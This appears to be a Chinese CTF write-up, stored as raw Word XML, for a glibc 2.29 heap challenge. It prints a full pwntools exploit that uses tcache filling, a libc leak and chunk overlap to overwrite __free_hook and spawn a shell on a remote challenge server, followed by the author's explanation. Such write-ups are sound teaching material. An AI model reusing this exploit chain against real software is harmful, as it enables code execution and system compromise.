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5548" w14:textId="5B068A3E" w:rsidR="00CC126B" w:rsidRDefault="000852FE" w:rsidP="000852F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先checksec一下文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD3F90F" w14:textId="33A27A02" w:rsidR="000852FE" w:rsidRDefault="000852FE" w:rsidP="000852FE">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000852FE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B2F6B4D" wp14:editId="7CFF1D01">
            <wp:extent cx="5274310" cy="286385"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="506624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24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83E4" w14:textId="3C9A50F9" w:rsidR="000852FE" w:rsidRDefault="000852FE" w:rsidP="000852FE">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>依旧保护全开</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE8F13E" w14:textId="169A5E70" w:rsidR="000852FE" w:rsidRDefault="000852FE" w:rsidP="000852F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放到ida看一下</w:t>
      </w:r>
      <w:r w:rsidRPr="000852FE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ED689DA" wp14:editId="491197E1">
            <wp:extent cx="5274310" cy="1704340"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1449039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39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1C6D" w14:textId="5DBADCCC" w:rsidR="000852FE" w:rsidRDefault="000852FE" w:rsidP="000852FE">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>悬空指针的漏洞，但是我们的libc版本是29已经引入了对double free的检查所以我们得想办法绕过，</w:t>
      </w:r>
      <w:r w:rsidR="009252D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们想到用tcache因为他最多一个大小放七个，所以我们先占满七个然后让他进入unsorted bin利用它指向</w:t>
      </w:r>
      <w:r w:rsidR="009252D8" w:rsidRPr="009252D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main_are</w:t>
      </w:r>
      <w:r w:rsidR="009252D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="009252D8" w:rsidRPr="009252D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="009252D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的特性，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B8EBD7" w14:textId="4E236939" w:rsidR="00E130D3" w:rsidRDefault="00E130D3" w:rsidP="00E130D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看一下脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD9B6D9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from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E487494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6CAD321F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# p = process('./pwn')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B68BFE1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p = remote('challenge.bluesharkinfo.com', 23861)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C95F4E1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gdbcmd = """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE022EB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# backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A880A5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# set follow-fork-mode child</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5BE360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# b *$rebase(0x1C38)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132EC4E0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# run code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0443878A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b *$rebase(0x202060)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB37B85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c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5996749B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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C044F99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# p = gdb.debug('./pwn', gdbcmd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6E92FF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490A2890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context(arch='amd64', os='linux', log_level='debug')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C2F3AE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430B2C1C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libc = ELF('./glibc/libc-2.29.so')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA7F61B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2C992BAC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def add(size, content):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2D325D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 xml:space="preserve">    p.sendlineafter('Your choice: ', '1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF1DB32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 xml:space="preserve">    p.sendlineafter('Size: ', str(size))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C72FCF5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 xml:space="preserve">    p.sendafter('Content: ', content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425F1D25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55EDDB9F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def delete(idx):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210F5208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 xml:space="preserve">    p.sendlineafter('Your choice: ', '2')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CACCA1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 xml:space="preserve">    p.sendlineafter('Index: ', str(idx))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76192084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3D01549A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def show(idx):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77175A1B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 xml:space="preserve">    p.sendlineafter('Your choice: ', '3')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E8A68F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 xml:space="preserve">    p.sendlineafter('Index: ', str(idx))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594A9364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 xml:space="preserve">    p.recvuntil('Content: ')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D053C32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 xml:space="preserve">    return p.recvline()[:-1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE30DF9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5D9BF20E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for i in range(11):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A1F2CE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 xml:space="preserve">    add(0x80, b'C' * 0x80) # chunk 2-12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EC9C01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for i in range(7):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6529C407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 xml:space="preserve">    delete(i+4) # chunk 6-12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E522F71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delete(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F2AEF0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delete(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562DD918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37EE587F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libc_base = u64(show(2)[:8].ljust(8, b'\x00')) - 0x1E4CA0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC5C465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libc.address = libc_base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370C42BD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print(f"Libc base: {hex(libc_base)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6923A6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18899317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payload = b'a'*0x80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DC8F87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payload += p64(0) + p64(0x81) + b'a'*0x80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587B1465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add(0x110, payload) # chunk 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CA4554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5ED26ACD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delete(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495818A8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delete(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B6CB3C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269F8D59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payload = b'a'*0x80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FE4CEC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payload += p64(0) + p64(0x81) + p64(libc_base + 0x1E75A8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D9DF6A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add(0x110, payload) # chunk 14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785CABA3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16318D05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# gdb.attach(p, f'b *{libc_base + 0x991D5}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FBB596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2471FAE2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add(0x70, b'aaaaaaaa') # chunk 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B27D34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add(0x70, p64(libc_base + 0x52FD0)) # chunk 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317A0A36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add(0x70, b'/bin/sh\x00') # chunk 17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E676AF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7163F2D6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delete(15)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2267DEB9" w14:textId="77777777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</w:p>
    <w:p w14:paraId="7C1F0C2F" w14:textId="7FF8D5E6" w:rsidR="00E130D3" w:rsidRP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p.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C856704" w14:textId="3D3F5A72" w:rsidR="00E130D3" w:rsidRDefault="00E130D3" w:rsidP="00E130D3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E130D3">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>我来一一讲解第一个是占满tcache7个位置然后释放chunk2，3到unsorted bin让他进行结合，释放2拿到libc基址，然后创建chunk13来清空堆内结构，chunk14拿到free_hook,chunk15的释放是为了调用free结合16，17完成攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C25BD30" w14:textId="70AD7F76" w:rsidR="00E55A09" w:rsidRPr="00E130D3" w:rsidRDefault="00E55A09" w:rsidP="00E130D3">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="36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我想了很久为什么要创建第一个payload，写了又释放了完全没用啊，但其实释放第一次的时候因为tcache已经满了，所以他会去unsorted bin等待去分配，chunk2和chunk3会被合并，并且是一个双链表所以不能正确修改，要重复一次操作并且把它放到fast bin单链表就可以正确修改hook了，其实里面的hook偏移地址也可以用+libc.symbols[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>所需函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00990DB9" w:rsidRPr="00990DB9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00990DB9" w:rsidRPr="00990DB9">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F761BDC" wp14:editId="0F651095">
            <wp:extent cx="5274310" cy="2192020"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1841845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45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A09" w:rsidRPr="00E13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97997" w14:textId="77777777" w:rsidR="00EE0B98" w:rsidRDefault="00EE0B98" w:rsidP="00E55A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B4B76A" w14:textId="77777777" w:rsidR="00EE0B98" w:rsidRDefault="00EE0B98" w:rsidP="00E55A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4D96" w14:textId="77777777" w:rsidR="00EE0B98" w:rsidRDefault="00EE0B98" w:rsidP="00E55A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224460" w14:textId="77777777" w:rsidR="00EE0B98" w:rsidRDefault="00EE0B98" w:rsidP="00E55A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C0C40"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4BDCB65E"/>
    <w:lvl w:ilvl="0" w:tplc="A7D4FD4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71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6B"/>
    <w:rsid w:val="000852FE"/>
    <w:rsid w:val="00454D6B"/>
    <w:rsid w:val="006C40DC"/>
    <w:rsid w:val="007E326C"/>
    <w:rsid w:val="009252D8"/>
    <w:rsid w:val="00990DB9"/>
    <w:rsid w:val="00B72EBF"/>
    <w:rsid w:val="00C01C51"/>
    <w:rsid w:val="00C51009"/>
    <w:rsid w:val="00CC126B"/>
    <w:rsid w:val="00D46644"/>
    <w:rsid w:val="00E130D3"/>
    <w:rsid w:val="00E55A09"/>
    <w:rsid w:val="00EE0B98"/>
    <w:rsid w:val="00FE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88471"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AF722835-3FDE-4B33-B9CA-D1451A01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12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2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2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2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2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2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2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2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12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1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1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12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12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12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12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12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12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12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2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12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12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12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12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1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12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126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5A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5A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5A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5A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435</Words>
  <Characters>1457</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>72</Lines>
  <Paragraphs>63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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-16T10:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-18T09:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>